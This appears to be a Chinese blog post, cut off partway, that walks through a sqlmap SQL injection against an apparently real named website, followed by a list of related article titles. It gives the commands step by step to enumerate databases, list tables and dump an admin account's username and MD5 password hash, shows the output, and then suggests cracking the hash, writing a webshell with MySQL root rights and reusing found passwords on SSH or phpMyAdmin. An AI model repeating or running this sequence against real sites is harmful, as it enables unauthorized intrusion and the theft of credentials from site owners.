sqlmap进行mysql注入root权限读写文件
来源:互联网 发布:罗格数据 编辑:程序博客网 时间:2024/06/05 22:23
1.在BT5 R2下root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 /*获取当前用户和当前数据库
返回结果 :
[02:42:20] [INFO] fetching current user current user: 'root@localhost' [02:42:21]
[INFO] fetching current database current database: 'wepost'
//当前用户为 root 当前数据库为 wepost
2.root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbs -v 2
//获取所有数据库 返回结果 : available databases [8]: [*] bb [*] cart [*] information_schema [*] mysql [*] taipotour [*] test [*] wepost [*] wepost2 看结果可以也可以知道 当前存在8个数据库
3.root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --tables -D wepost -v 2
//获取wepost数据库(也就是当前数据库)的所有表名 返回结果 : Database: wepost [6 tables]| admin | | article | | contributor | | idea | | image | | issue |看结果可以也可以知道 存在6个表
4.root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --columns -D wepost -T admin -v 2
//获取wepost数据库里admin表的字段 返回结果 : Database: wepost Table: admin [4 columns]|id|int(11)|password|varchar(32)|type|varchar(10)|userid|varchar(20)看结果可以也可以知道 存在4个字段
5.root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dump -D "wepost" -T "admin" -C "userid,password" -s "sqlnmapdb.log" -v -v 2
//获取wepost数据库里 admin表里 userid和password字段里面的内容 并将数据保存下来 /pentest/database/sqlmap/output/www.wepost.com.hk 返回结果 : Database: wepost Table: admin [1 entry]| password | userid | |7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
[03:08:51] [INFO] Table 'wepost.admin' dumped to CSV file '/pentest/database/sqlmap/output/www.wepost.com.hk/dump/wepost/admin.csv'
[03:08:51] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.wepost.com.hk'
//得到帐号密码|7d4d7589db8b28e04db0982dd0e92189|wepost2010|破MD5找后台去吧。。。
// mysql既然是root权限 当然可以试着写shell或者读文件 (一般读都是读apache配置文件找网站路径 网站配置文件获取root密码尝试社工直接登录linux的ssh或者登录phpmyadmin登录执行sql语句写shell 或者读其他铭感信息) root权限写shell的3个条件:
- sqlmap进行mysql注入root权限读写文件
- dver实例sqlmap进行mysql注入root权限读写文件
- 利用SQLMap进行cookie注入
- 使用sqlmap进行sql注入
- 使用sqlmap进行sql注入
- 使用sqlmap 绕过防火墙进行注入测试
- 使用sqlmap 绕过防火墙进行注入测试
- 利用burpsite和sqlmap进行post注入
- 使用sqlmap 绕过防火墙进行注入测试
- sqlmap之(四)----Mysql注入实战
- SQLMAP渗透笔记之MySQL数据库注入
- mysql 命令行对文件进行读写操作
- MySQL root权限访问
- 使用Burpsuite辅助Sqlmap进行POST注入测试
- sqlmap使用post方法对cookie进行注入
- 使用SQLMAP对网站和数据库进行SQL注入攻击
- (转载)使用sqlmap 绕过防火墙进行注入测试
- Burpsuite与sqlmap结合进行sql注入渗透测试
- JQuery.autocomplete扩展功能:实现多列自动提示
- php 个人实践经验技巧
- “微软创投加速器”第四期启动,共有19家初创企业入驻
- 浅析 Linux 中的时间编程和实现原理
- RelativeLayout常用属性介绍
- sqlmap进行mysql注入root权限读写文件
- lsof常用参数
- Windows系统如何使用sqlmap
- CRM上线之路 走上了CRM实施顾问-第113天上班 -第24周 .
- Discuz的利用UC_KEY进行getshell
- 微信/易信公共平台开发(四):公众号调试器 (仿真微信平台,提供PHP源码)
- 法国出售给阿联酋的卫星可能含有后门组件
- 整型和字符串相互转换
- 读懂diff